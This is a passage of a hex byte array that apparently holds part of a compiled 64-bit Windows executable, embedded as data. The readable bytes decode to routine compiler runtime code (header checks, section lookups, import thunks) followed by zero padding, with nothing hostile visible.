,0x00 ,0x00 ,0x00 ,0x00 ,0x57 ,0x56 ,0x53 ,0x48 ,0x83 ,0xec ,0x20 ,0x48 ,0x89 ,0xce ,0xe8 ,0xb1 ,0x03 ,0x00 ,0x00 ,0x48 ,0x83 ,0xf8 ,0x08 ,0x77 ,0x6b ,0x48 ,0x8b ,0x15 ,0x64 ,0x1e ,0x00 ,0x00 ,0x66 ,0x81 ,0x3a ,0x4d ,0x5a ,0x75 ,0x5d ,0x48 ,0x89 ,0xd1 ,0xe8 ,0x45 ,0xff ,0xff ,0xff ,0x85 ,0xc0 ,0x74 ,0x51 ,0x48 ,0x63 ,0x4a ,0x3c ,0x48 ,0x01 ,0xd1 ,0x0f ,0xb7 ,0x41 ,0x14 ,0x48 ,0x8d ,0x5c ,0x01 ,0x18 ,0x0f ,0xb7 ,0x41 ,0x06 ,0x85 ,0xc0 ,0x74 ,0x39 ,0x83 ,0xe8 ,0x01 ,0x48 ,0x8d ,0x04 ,0x80 ,0x48 ,0x8d ,0x7c ,0xc3 ,0x28 ,0xeb ,0x09 ,0x48 ,0x83 ,0xc3 ,0x28 ,0x48 ,0x39 ,0xfb ,0x74 ,0x22 ,0x41 ,0xb8 ,0x08 ,0x00 ,0x00 ,0x00 ,0x48 ,0x89 ,0xf2 ,0x48 ,0x89 ,0xd9 ,0xe8 ,0x49 ,0x03 ,0x00 ,0x00 ,0x85 ,0xc0 ,0x75 ,0xe2 ,0x48 ,0x89 ,0xd8 ,0x48 ,0x83 ,0xc4 ,0x20 ,0x5b ,0x5e ,0x5f ,0xc3 ,0x66 ,0x90 ,0x31 ,0xdb ,0x48 ,0x89 ,0xd8 ,0x48 ,0x83 ,0xc4 ,0x20 ,0x5b ,0x5e ,0x5f ,0xc3 ,0x0f ,0x1f ,0x00 ,0x48 ,0x83 ,0xec ,0x28 ,0x4c ,0x8b ,0x05 ,0xe5 ,0x1d ,0x00 ,0x00 ,0x66 ,0x41 ,0x81 ,0x38 ,0x4d ,0x5a ,0x48 ,0x89 ,0xca ,0x75 ,0x57 ,0x4c ,0x89 ,0xc1 ,0xe8 ,0xc2 ,0xfe ,0xff ,0xff ,0x85 ,0xc0 ,0x74 ,0x4b ,0x49 ,0x63 ,0x40 ,0x3c ,0x48 ,0x89 ,0xd1 ,0x4c ,0x29 ,0xc1 ,0x49 ,0x01 ,0xc0 ,0x41 ,0x0f ,0xb7 ,0x50 ,0x06 ,0x41 ,0x0f ,0xb7 ,0x40 ,0x14 ,0x85 ,0xd2 ,0x49 ,0x8d ,0x44 ,0x00 ,0x18 ,0x74 ,0x2b ,0x83 ,0xea ,0x01 ,0x48 ,0x8d ,0x14 ,0x92 ,0x4c ,0x8d ,0x4c ,0xd0 ,0x28 ,0x66 ,0x90 ,0x44 ,0x8b ,0x40 ,0x0c ,0x4c ,0x39 ,0xc1 ,0x4c ,0x89 ,0xc2 ,0x72 ,0x08 ,0x03 ,0x50 ,0x08 ,0x48 ,0x39 ,0xd1 ,0x72 ,0x0b ,0x48 ,0x83 ,0xc0 ,0x28 ,0x4c ,0x39 ,0xc8 ,0x75 ,0xe3 ,0x31 ,0xc0 ,0x48 ,0x83 ,0xc4 ,0x28 ,0xc3 ,0x66 ,0x90 ,0x66 ,0x2e ,0x0f ,0x1f ,0x84 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x48 ,0x83 ,0xec ,0x28 ,0x48 ,0x8b ,0x15 ,0x65 ,0x1d ,0x00 ,0x00 ,0x45 ,0x31 ,0xc0 ,0x66 ,0x81 ,0x3a ,0x4d ,0x5a ,0x74 ,0x0b ,0x44 ,0x89 ,0xc0 ,0x48 ,0x83 ,0xc4 ,0x28 ,0xc3 ,0x0f ,0x1f ,0x00 ,0x48 ,0x89 ,0xd1 ,0xe8 ,0x38 ,0xfe ,0xff ,0xff ,0x85 ,0xc0 ,0x74 ,0xe9 ,0x48 ,0x63 ,0x42 ,0x3c ,0x44 ,0x0f ,0xb7 ,0x44 ,0x10 ,0x06 ,0x44 ,0x89 ,0xc0 ,0x48 ,0x83 ,0xc4 ,0x28 ,0xc3 ,0x66 ,0x90 ,0x48 ,0x83 ,0xec ,0x28 ,0x4c ,0x8b ,0x05 ,0x25 ,0x1d ,0x00 ,0x00 ,0x66 ,0x41 ,0x81 ,0x38 ,0x4d ,0x5a ,0x48 ,0x89 ,0xca ,0x75 ,0x52 ,0x4c ,0x89 ,0xc1 ,0xe8 ,0x02 ,0xfe ,0xff ,0xff ,0x85 ,0xc0 ,0x74 ,0x46 ,0x49 ,0x63 ,0x48 ,0x3c ,0x4c ,0x01 ,0xc1 ,0x0f ,0xb7 ,0x41 ,0x14 ,0x48 ,0x8d ,0x44 ,0x01 ,0x18 ,0x0f ,0xb7 ,0x49 ,0x06 ,0x85 ,0xc9 ,0x74 ,0x2e ,0x83 ,0xe9 ,0x01 ,0x48 ,0x8d ,0x0c ,0x89 ,0x48 ,0x8d ,0x4c ,0xc8 ,0x28 ,0x66 ,0x2e ,0x0f ,0x1f ,0x84 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0xf6 ,0x40 ,0x27 ,0x20 ,0x74 ,0x09 ,0x48 ,0x85 ,0xd2 ,0x74 ,0x0f ,0x48 ,0x83 ,0xea ,0x01 ,0x48 ,0x83 ,0xc0 ,0x28 ,0x48 ,0x39 ,0xc8 ,0x75 ,0xe8 ,0x31 ,0xc0 ,0x48 ,0x83 ,0xc4 ,0x28 ,0xc3 ,0x90 ,0x48 ,0x83 ,0xec ,0x28 ,0x48 ,0x8b ,0x15 ,0xb5 ,0x1c ,0x00 ,0x00 ,0x66 ,0x81 ,0x3a ,0x4d ,0x5a ,0x75 ,0x1e ,0x48 ,0x89 ,0xd1 ,0xe8 ,0x96 ,0xfd ,0xff ,0xff ,0x85 ,0xc0 ,0xb8 ,0x00 ,0x00 ,0x00 ,0x00 ,0x48 ,0x0f ,0x45 ,0xc2 ,0x48 ,0x83 ,0xc4 ,0x28 ,0xc3 ,0x66 ,0x0f ,0x1f ,0x44 ,0x00 ,0x00 ,0x31 ,0xc0 ,0x48 ,0x83 ,0xc4 ,0x28 ,0xc3 ,0x66 ,0x0f ,0x1f ,0x84 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x48 ,0x83 ,0xec ,0x28 ,0x4c ,0x8b ,0x05 ,0x75 ,0x1c ,0x00 ,0x00 ,0x31 ,0xc0 ,0x66 ,0x41 ,0x81 ,0x38 ,0x4d ,0x5a ,0x48 ,0x89 ,0xca ,0x74 ,0x08 ,0x48 ,0x83 ,0xc4 ,0x28 ,0xc3 ,0x0f ,0x1f ,0x00 ,0x4c ,0x89 ,0xc1 ,0xe8 ,0x48 ,0xfd ,0xff ,0xff ,0x85 ,0xc0 ,0x74 ,0xec ,0x49 ,0x63 ,0x40 ,0x3c ,0x48 ,0x89 ,0xd1 ,0x4c ,0x29 ,0xc1 ,0x49 ,0x01 ,0xc0 ,0x41 ,0x0f ,0xb7 ,0x50 ,0x06 ,0x41 ,0x0f ,0xb7 ,0x40 ,0x14 ,0x85 ,0xd2 ,0x49 ,0x8d ,0x44 ,0x00 ,0x18 ,0x74 ,0x31 ,0x83 ,0xea ,0x01 ,0x48 ,0x8d ,0x14 ,0x92 ,0x4c ,0x8d ,0x4c ,0xd0 ,0x28 ,0x0f ,0x1f ,0x84 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x44 ,0x8b ,0x40 ,0x0c ,0x4c ,0x39 ,0xc1 ,0x4c ,0x89 ,0xc2 ,0x72 ,0x08 ,0x03 ,0x50 ,0x08 ,0x48 ,0x39 ,0xd1 ,0x72 ,0x10 ,0x48 ,0x83 ,0xc0 ,0x28 ,0x4c ,0x39 ,0xc8 ,0x75 ,0xe3 ,0x31 ,0xc0 ,0x48 ,0x83 ,0xc4 ,0x28 ,0xc3 ,0x8b ,0x40 ,0x24 ,0xf7 ,0xd0 ,0xc1 ,0xe8 ,0x1f ,0x48 ,0x83 ,0xc4 ,0x28 ,0xc3 ,0x0f ,0x1f ,0x44 ,0x00 ,0x00 ,0x66 ,0x2e ,0x0f ,0x1f ,0x84 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x48 ,0x83 ,0xec ,0x28 ,0x4c ,0x8b ,0x1d ,0xd5 ,0x1b ,0x00 ,0x00 ,0x66 ,0x41 ,0x81 ,0x3b ,0x4d ,0x5a ,0x41 ,0x89 ,0xc9 ,0x75 ,0x58 ,0x4c ,0x89 ,0xd9 ,0xe8 ,0xb2 ,0xfc ,0xff ,0xff ,0x85 ,0xc0 ,0x74 ,0x4c ,0x49 ,0x63 ,0x43 ,0x3c ,0x4c ,0x01 ,0xd8 ,0x8b ,0x90 ,0x90 ,0x00 ,0x00 ,0x00 ,0x85 ,0xd2 ,0x74 ,0x3b ,0x0f ,0xb7 ,0x48 ,0x14 ,0x48 ,0x8d ,0x4c ,0x08 ,0x18 ,0x0f ,0xb7 ,0x40 ,0x06 ,0x85 ,0xc0 ,0x74 ,0x2a ,0x83 ,0xe8 ,0x01 ,0x48 ,0x8d ,0x04 ,0x80 ,0x48 ,0x8d ,0x44 ,0xc1 ,0x28 ,0x44 ,0x8b ,0x51 ,0x0c ,0x4c ,0x39 ,0xd2 ,0x4d ,0x89 ,0xd0 ,0x72 ,0x09 ,0x44 ,0x03 ,0x41 ,0x08 ,0x4c ,0x39 ,0xc2 ,0x72 ,0x10 ,0x48 ,0x83 ,0xc1 ,0x28 ,0x48 ,0x39 ,0xc1 ,0x75 ,0xe2 ,0x31 ,0xc0 ,0x48 ,0x83 ,0xc4 ,0x28 ,0xc3 ,0x4c ,0x01 ,0xda ,0x75 ,0x0e ,0xeb ,0xf2 ,0x0f ,0x1f ,0x40 ,0x00 ,0x41 ,0x83 ,0xe9 ,0x01 ,0x48 ,0x83 ,0xc2 ,0x14 ,0x8b ,0x4a ,0x04 ,0x85 ,0xc9 ,0x75 ,0x07 ,0x8b ,0x42 ,0x0c ,0x85 ,0xc0 ,0x74 ,0xd8 ,0x45 ,0x85 ,0xc9 ,0x7f ,0xe5 ,0x8b ,0x42 ,0x0c ,0x4c ,0x01 ,0xd8 ,0x48 ,0x83 ,0xc4 ,0x28 ,0xc3 ,0x90 ,0x90 ,0x90 ,0x90 ,0x90 ,0x90 ,0x90 ,0x90 ,0x90 ,0x90 ,0xdb ,0xe3 ,0xc3 ,0x90 ,0x90 ,0x90 ,0x90 ,0x90 ,0x90 ,0x90 ,0x90 ,0x90 ,0x90 ,0x90 ,0x90 ,0x90 ,0x51 ,0x50 ,0x48 ,0x3d ,0x00 ,0x10 ,0x00 ,0x00 ,0x48 ,0x8d ,0x4c ,0x24 ,0x18 ,0x72 ,0x19 ,0x48 ,0x81 ,0xe9 ,0x00 ,0x10 ,0x00 ,0x00 ,0x48 ,0x83 ,0x09 ,0x00 ,0x48 ,0x2d ,0x00 ,0x10 ,0x00 ,0x00 ,0x48 ,0x3d ,0x00 ,0x10 ,0x00 ,0x00 ,0x77 ,0xe7 ,0x48 ,0x29 ,0xc1 ,0x48 ,0x83 ,0x09 ,0x00 ,0x58 ,0x59 ,0xc3 ,0x90 ,0x90 ,0x90 ,0x90 ,0x90 ,0x90 ,0x90 ,0x90 ,0x90 ,0x90 ,0x90 ,0x90 ,0x90 ,0x90 ,0xb8 ,0x01 ,0x00 ,0x00 ,0x00 ,0xc3 ,0x90 ,0x90 ,0x90 ,0x90 ,0x90 ,0x90 ,0x90 ,0x90 ,0x90 ,0x90 ,0xff ,0x25 ,0x3a ,0x6b ,0x00 ,0x00 ,0x90 ,0x90 ,0xff ,0x25 ,0x2a ,0x6b ,0x00 ,0x00 ,0x90 ,0x90 ,0xff ,0x25 ,0x1a ,0x6b ,0x00 ,0x00 ,0x90 ,0x90 ,0xff ,0x25 ,0x0a ,0x6b ,0x00 ,0x00 ,0x90 ,0x90 ,0xff ,0x25 ,0xf2 ,0x6a ,0x00 ,0x00 ,0x90 ,0x90 ,0xff ,0x25 ,0xe2 ,0x6a ,0x00 ,0x00 ,0x90 ,0x90 ,0xff ,0x25 ,0xd2 ,0x6a ,0x00 ,0x00 ,0x90 ,0x90 ,0xff ,0x25 ,0xc2 ,0x6a ,0x00 ,0x00 ,0x90 ,0x90 ,0xff ,0x25 ,0xa2 ,0x6a ,0x00 ,0x00 ,0x90 ,0x90 ,0xff ,0x25 ,0x92 ,0x6a ,0x00 ,0x00 ,0x90 ,0x90 ,0x48 ,0x85 ,0xc9 ,0x74 ,0x1a ,0x31 ,0xc0 ,0x48 ,0xc7 ,0x41 ,0x10 ,0x00 ,0x00 ,0x00 ,0x00 ,0x48 ,0xc7 ,0x41 ,0x08 ,0x00 ,0x00 ,0x00 ,0x00 ,0x48 ,0xc7 ,0x01 ,0x00 ,0x00 ,0x00 ,0x00 ,0xc3 ,0xb8 ,0xff ,0xff ,0xff ,0xff ,0xc3 ,0x90 ,0x66 ,0x2e ,0x0f ,0x1f ,0x84 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x55 ,0x57 ,0x56 ,0x53 ,0x48 ,0x83 ,0xec ,0x28 ,0x48 ,0x85 ,0xc9 ,0x48 ,0x89 ,0xcb ,0x48 ,0x89 ,0xd7 ,0x0f ,0x84 ,0x99 ,0x00 ,0x00 ,0x00 ,0xb9 ,0x08 ,0x00 ,0x00 ,0x00 ,0xe8 ,0x4f ,0x01 ,0x00 ,0x00 ,0x48 ,0x83 ,0x3b ,0x00 ,0x74 ,0x5d ,0x48 ,0x8b ,0x73 ,0x08 ,0x48 ,0x8b ,0x43 ,0x10 ,0x48 ,0x39 ,0xf0 ,0x74 ,0x20 ,0x48 ,0x8d ,0x46 ,0x08 ,0xb9 ,0x08 ,0x00 ,0x00 ,0x00 ,0x48 ,0x89 ,0x43 ,0x08 ,0x48 ,0x89 ,0x3e ,0xe8 ,0x1f ,0x01 ,0x00 ,0x00 ,0x31 ,0xc0 ,0x48 ,0x83 ,0xc4 ,0x28 ,0x5b ,0x5e ,0x5f ,0x5d ,0xc3 ,0x48 ,0x8b ,0x0b ,0x48 ,0x29 ,0xce ,0x48 ,0x89 ,0xf0 ,0x48 ,0xc1 ,0xf8 ,0x03 ,0x48 ,0xc1 ,0xe0 ,0x04 ,0x48 ,0x89 ,0xc2 ,0x48 ,0x89 ,0xc5 ,0xe8 ,0xf0 ,0x00 ,0x00 ,0x00 ,0x48 ,0x85 ,0xc0 ,0x74 ,0x42 ,0x48 ,0x89 ,0x03 ,0x48 ,0x01 ,0xc6 ,0x48 ,0x01 ,0xe8 ,0x48 ,0x89 ,0x43 ,0x10 ,0xeb ,0xb0 ,0xba ,0x08 ,0x00 ,0x00 ,0x00 ,0xb9 ,0x20 ,0x00 ,0x00 ,0x00 ,0xe8 ,0x1d ,0xff ,0xff ,0xff ,0x48 ,0x85 ,0xc0 ,0x48 ,0x89 ,0xc6 ,0x48 ,0x89 ,0x03 ,0x74 ,0x19 ,0x48 ,0x89 ,0x43 ,0x08 ,0x48 ,0x8d ,0x80 ,0x00 ,0x01 ,0x00 ,0x00 ,0x48 ,0x89 ,0x43 ,0x10 ,0xeb ,0x80 ,0x90 ,0xb8 ,0xff ,0xff ,0xff ,0xff ,0xeb ,0x94 ,0xb9 ,0x08 ,0x00 ,0x00 ,0x00 ,0xe8 ,0xa7 ,0x00 ,0x00 ,0x00 ,0xb8 ,0xff ,0xff ,0xff ,0xff ,0xeb ,0x83 ,0x0f ,0x1f ,0x84 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x57 ,0x56 ,0x53 ,0x48 ,0x83 ,0xec ,0x20 ,0x48 ,0x89 ,0xcf ,0xb9 ,0x08 ,0x00 ,0x00 ,0x00 ,0xe8 ,0x8c ,0x00 ,0x00 ,0x00 ,0x48 ,0x8b ,0x37 ,0xb9 ,0x08 ,0x00 ,0x00 ,0x00 ,0x48 ,0xc7 ,0x47 ,0x10 ,0x00 ,0x00 ,0x00 ,0x00 ,0x48 ,0x8b ,0x5f ,0x08 ,0x48 ,0xc7 ,0x07 ,0x00 ,0x00 ,0x00 ,0x00 ,0x48 ,0xc7 ,0x47 ,0x08 ,0x00 ,0x00 ,0x00 ,0x00 ,0xe8 ,0x5c ,0x00 ,0x00 ,0x00 ,0x48 ,0x85 ,0xf6 ,0x74 ,0x24 ,0x48 ,0x83 ,0xeb ,0x08 ,0x48 ,0x39 ,0xde ,0x77 ,0x13 ,0x48 ,0x8b ,0x03 ,0x48 ,0x85 ,0xc0 ,0x74 ,0xef ,0xff ,0xd0 ,0x48 ,0x83 ,0xeb ,0x08 ,0x48 ,0x39 ,0xde ,0x76 ,0xed ,0x48 ,0x89 ,0xf1 ,0xe8 ,0x73 ,0xfe ,0xff ,0xff ,0x31 ,0xc0 ,0x48 ,0x83 ,0xc4 ,0x20 ,0x5b ,0x5e ,0x5f ,0xc3 ,0x90 ,0x53 ,0x48 ,0x83 ,0xec ,0x20 ,0x89 ,0xcb ,0xe8 ,0x2c ,0x00 ,0x00 ,0x00 ,0x89 ,0xd9 ,0x48 ,0x8d ,0x14 ,0x49 ,0x48 ,0xc1 ,0xe2 ,0x04 ,0x48 ,0x01 ,0xd0 ,0x48 ,0x83 ,0xc4 ,0x20 ,0x5b ,0xc3 ,0x90 ,0xff ,0x25 ,0x3a ,0x69 ,0x00 ,0x00 ,0x90 ,0x90 ,0xff ,0x25 ,0x0a ,0x69 ,0x00 ,0x00 ,0x90 ,0x90 ,0xff ,0x25 ,0xfa ,0x68 ,0x00 ,0x00 ,0x90 ,0x90 ,0xff ,0x25 ,0xda ,0x68 ,0x00 ,0x00 ,0x90 ,0x90 ,0xff ,0x25 ,0x4a ,0x69 ,0x00 ,0x00 ,0x90 ,0x90 ,0x0f ,0x1f ,0x84 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0xff ,0x25 ,0xb2 ,0x68 ,0x00 ,0x00 ,0x90 ,0x90 ,0xff ,0x25 ,0xa2 ,0x68 ,0x00 ,0x00 ,0x90 ,0x90 ,0xff ,0x25 ,0x92 ,0x68 ,0x00 ,0x00 ,0x90 ,0x90 ,0xff ,0x25 ,0x82 ,0x68 ,0x00 ,0x00 ,0x90 ,0x90 ,0xff ,0x25 ,0x72 ,0x68 ,0x00 ,0x00 ,0x90 ,0x90 ,0xff ,0x25 ,0x62 ,0x68 ,0x00 ,0x00 ,0x90 ,0x90 ,0xff ,0x25 ,0x52 ,0x68 ,0x00 ,0x00 ,0x90 ,0x90 ,0xff ,0x25 ,0x42 ,0x68 ,0x00 ,0x00 ,0x90 ,0x90 ,0xff ,0x25 ,0x32 ,0x68 ,0x00 ,0x00 ,0x90 ,0x90 ,0xff ,0x25 ,0x22 ,0x68 ,0x00 ,0x00 ,0x90 ,0x90 ,0xff ,0x25 ,0x12 ,0x68 ,0x00 ,0x00 ,0x90 ,0x90 ,0xff ,0x25 ,0x02 ,0x68 ,0x00 ,0x00 ,0x90 ,0x90 ,0xff ,0x25 ,0xf2 ,0x67 ,0x00 ,0x00 ,0x90 ,0x90 ,0xff ,0x25 ,0xe2 ,0x67 ,0x00 ,0x00 ,0x90 ,0x90 ,0xff ,0x25 ,0xd2 ,0x67 ,0x00 ,0x00 ,0x90 ,0x90 ,0xff ,0x25 ,0xc2 ,0x67 ,0x00 ,0x00 ,0x90 ,0x90 ,0xff ,0x25 ,0xb2 ,0x67 ,0x00 ,0x00 ,0x90 ,0x90 ,0xff ,0x25 ,0xa2 ,0x67 ,0x00 ,0x00 ,0x90 ,0x90 ,0xff ,0x25 ,0x92 ,0x67 ,0x00 ,0x00 ,0x90 ,0x90 ,0xff ,0x25 ,0x82 ,0x67 ,0x00 ,0x00 ,0x90 ,0x90 ,0xff ,0x25 ,0x72 ,0x67 ,0x00 ,0x00 ,0x90 ,0x90 ,0xff ,0x25 ,0x62 ,0x67 ,0x00 ,0x00 ,0x90 ,0x90 ,0xff ,0x25 ,0x52 ,0x67 ,0x00 ,0x00 ,0x90 ,0x90 ,0x0f ,0x1f ,0x84 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x56 ,0x53 ,0x48 ,0x83 ,0xec ,0x38 ,0x48 ,0x8d ,0x44 ,0x24 ,0x58 ,0x48 ,0x89 ,0xcb ,0xb9 ,0x02 ,0x00 ,0x00 ,0x00 ,0x48 ,0x89 ,0x54 ,0x24 ,0x58 ,0x4c ,0x89 ,0x44 ,0x24 ,0x60 ,0x4c ,0x89 ,0x4c ,0x24 ,0x68 ,0x48 ,0x89 ,0x44 ,0x24 ,0x28 ,0xe8 ,0xc4 ,0xfe ,0xff ,0xff ,0x41 ,0xb8 ,0x1b ,0x00 ,0x00 ,0x00 ,0xba ,0x01 ,0x00 ,0x00 ,0x00 ,0x48 ,0x8d ,0x0d ,0x52 ,0x16 ,0x00 ,0x00 ,0x49 ,0x89 ,0xc1 ,0xe8 ,0x0a ,0xfd ,0xff ,0xff ,0x48 ,0x8b ,0x74 ,0x24 ,0x28 ,0xb9 ,0x02 ,0x00 ,0x00 ,0x00 ,0xe8 ,0x9b ,0xfe ,0xff ,0xff ,0x48 ,0x89 ,0xda ,0x48 ,0x89 ,0xc1 ,0x49 ,0x89 ,0xf0 ,0xe8 ,0xcd ,0xfc ,0xff ,0xff ,0xe8 ,0x00 ,0xfd ,0xff ,0xff ,0x90 ,0x90 ,0x90 ,0x90 ,0x90 ,0x90 ,0x90 ,0x90 ,0xe9 ,0xcb ,0xe8 ,0xff ,0xff ,0x90 ,0x90 ,0x90 ,0x90 ,0x90 ,0x90 ,0x90 ,0x90 ,0x90 ,0x90 ,0x90 ,0xff ,0xff ,0xff ,0xff ,0xff ,0xff ,0xff ,0xff ,0xc0 ,0x2a ,0xcc ,0x68 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0xff ,0xff ,0xff ,0xff ,0xff ,0xff ,0xff ,0xff ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0xf0 ,0x2a ,0xcc ,0x68 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0xff ,0xff ,0xff ,0xff ,0xff ,0xff ,0xff ,0xff ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x02 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0xd0 ,0x28 ,0xcc ,0x68 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x28 ,0xcc ,0x68 ,0x00 ,0x00 ,0x00 ,0x00 ,0xd0 ,0x27 ,0xcc ,0x68 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x40 ,0x29 ,0xcc ,0x68 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x32 ,0xa2 ,0xdf ,0x2d ,0x99 ,0x2b ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0xcd ,0x5d ,0x20 ,0xd2 ,0x66 ,0xd4 ,0xff ,0xff ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 